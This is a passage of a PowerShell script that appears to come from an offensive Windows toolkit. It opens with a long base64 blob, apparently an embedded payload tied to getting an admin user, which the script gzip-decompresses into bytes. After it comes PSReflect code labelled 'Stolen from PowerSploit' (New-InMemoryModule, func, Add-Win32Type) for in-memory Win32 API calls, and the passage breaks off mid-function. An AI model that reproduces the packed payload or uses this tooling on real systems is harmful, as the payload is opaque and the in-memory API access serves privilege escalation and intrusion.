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
")

    $getadminuser_ms = New-Object System.IO.MemoryStream -ArgumentList @(,$getadminuser_data)
    $ms = New-Object System.IO.MemoryStream
    $gzs = New-Object System.IO.Compression.GZipStream -ArgumentList @($getadminuser_ms, [System.IO.Compression.CompressionMode]::Decompress)
    $gzs.CopyTo($ms)
    $gzs.Close()
    $getadminuser_ms.Close()

    return $ms.ToArray()
}

########################################################
# Stolen from PowerSploit: https://github.com/PowerShellMafia/PowerSploit
########################################################

########################################################
#
# PSReflect code for Windows API access
# Author: @mattifestation
#   https://raw.githubusercontent.com/mattifestation/PSReflect/master/PSReflect.psm1
#
########################################################

function New-InMemoryModule {
<#
.SYNOPSIS
Creates an in-memory assembly and module
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
When defining custom enums, structs, and unmanaged functions, it is
necessary to associate to an assembly module. This helper function
creates an in-memory module that can be passed to the 'enum',
'struct', and Add-Win32Type functions.
.PARAMETER ModuleName
Specifies the desired name for the in-memory assembly and module. If
ModuleName is not provided, it will default to a GUID.
.EXAMPLE
$Module = New-InMemoryModule -ModuleName Win32
#>

    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
    [CmdletBinding()]
    Param (
        [Parameter(Position = 0)]
        [ValidateNotNullOrEmpty()]
        [String]
        $ModuleName = [Guid]::NewGuid().ToString()
    )

    $AppDomain = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($null, @())
    $LoadedAssemblies = $AppDomain.GetAssemblies()

    foreach ($Assembly in $LoadedAssemblies) {
        if ($Assembly.FullName -and ($Assembly.FullName.Split(',')[0] -eq $ModuleName)) {
            return $Assembly
        }
    }

    $DynAssembly = New-Object Reflection.AssemblyName($ModuleName)
    $Domain = $AppDomain
    $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, 'Run')
    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule($ModuleName, $False)

    return $ModuleBuilder
}

# A helper function used to reduce typing while defining function
# prototypes for Add-Win32Type.
function func {
    Param (
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $DllName,

        [Parameter(Position = 1, Mandatory = $True)]
        [string]
        $FunctionName,

        [Parameter(Position = 2, Mandatory = $True)]
        [Type]
        $ReturnType,

        [Parameter(Position = 3)]
        [Type[]]
        $ParameterTypes,

        [Parameter(Position = 4)]
        [Runtime.InteropServices.CallingConvention]
        $NativeCallingConvention,

        [Parameter(Position = 5)]
        [Runtime.InteropServices.CharSet]
        $Charset,

        [String]
        $EntryPoint,

        [Switch]
        $SetLastError
    )

    $Properties = @{
        DllName = $DllName
        FunctionName = $FunctionName
        ReturnType = $ReturnType
    }

    if ($ParameterTypes) { $Properties['ParameterTypes'] = $ParameterTypes }
    if ($NativeCallingConvention) { $Properties['NativeCallingConvention'] = $NativeCallingConvention }
    if ($Charset) { $Properties['Charset'] = $Charset }
    if ($SetLastError) { $Properties['SetLastError'] = $SetLastError }
    if ($EntryPoint) { $Properties['EntryPoint'] = $EntryPoint }

    New-Object PSObject -Property $Properties
}

function Add-Win32Type
{
<#
.SYNOPSIS
Creates a .NET type for an unmanaged Win32 function.
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: func
.DESCRIPTION
Add-Win32Type enables you to easily interact with unmanaged (i.e.
Win32 unmanaged) functions in PowerShell. After providing
Add-Win32Type with a function signature, a .NET type is created
using reflection (i.e. csc.exe is never called like with Add-Type).
The 'func' helper function can be used to reduce typing when defining
multiple function definitions.
.PARAMETER DllName
The name of the DLL.
.PARAMETER FunctionName
The name of the target function.
.PARAMETER EntryPoint
The DLL export function name. This argument should be specified if the
specified function name is different than the name of the exported
function.
.PARAMETER ReturnType
The return type of the function.
.PARAMETER ParameterTypes
The function parameters.
.PARAMETER NativeCallingConvention
Specifies the native calling convention of the function. Defaults to
stdcall.
.PARAMETER Charset
If you need to explicitly call an 'A' or 'W' Win32 function, you can
specify the character set.
.PARAMETER SetLastError
Indicates whether the callee calls the SetLastError Win32 API
function before returning from the attributed method.
.PARAMETER Module
The in-memory module that will host the functions. Use
New-InMemoryModule to define an in-memory module.
.PARAMETER Namespace
An optional namespace to prepend to the type. Add-Win32Type defaults
to a namespace consisting only of the name of the DLL.
.EXAMPLE
$Mod = New-InMemoryModule -ModuleName Win32
$FunctionDefinitions = @(
  (func kernel32 GetProcAddress ([IntPtr]) @([IntPtr], [String]) -Charset Ansi -SetLastError),
  (func kernel32 GetModuleHandle ([Intptr]) @([String]) -SetLastError),
  (func ntdll RtlGetCurrentPeb ([IntPtr]) @())
)
$Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32'
$Kernel32 = $Types['kernel32']
$Ntdll = $Types['ntdll']
$Ntdll::RtlGetCurrentPeb()
$ntdllbase = $Kernel32::GetModuleHandle('ntdll')
$Kernel32::GetProcAddress($ntdllbase, 'RtlGetCurrentPeb')
.NOTES
Inspired by Lee Holmes' Invoke-WindowsApi http://poshcode.org/2189
When defining multiple function prototypes, it is ideal to provide
Add-Win32Type with an array of function signatures. That way, they
are all incorporated into the same in-memory module.
#>

    [OutputType([Hashtable])]
    Param(
        [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]
        [String]
        $DllName,

        [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]
        [String]
        $FunctionName,

        [Parameter(ValueFromPipelineByPropertyName=$True)]
        [String]
        $EntryPoint,

        [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]
        [Type]
        $ReturnType,

        [Parameter(ValueFromPipelineByPropertyName=$True)]
        [Type[]]
        $ParameterTypes,

        [Parameter(ValueFromPipelineByPropertyName=$True)]
        [Runtime.InteropServices.CallingConvention]
        $NativeCallingConvention = [Runtime.InteropServices.CallingConvention]::StdCall,

        [Parameter(ValueFromPipelineByPropertyName=$True)]
        [Runtime.InteropServices.CharSet]
        $Charset = [Runtime.InteropServices.CharSet]::Auto,

        [Parameter(ValueFromPipelineByPropertyName=$True)]
        [Switch]
        $SetLastError,

        [Parameter(Mandatory=$True)]
        [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]
        $Module,

        [ValidateNotNull()]
        [String]
        $Namespace = ''
    )

    BEGIN
    {
        $TypeHash = @{}
    }

    PROCESS
    {
        if ($Module -is [Reflection.Assembly])
        {
            if ($Namespace)
            {
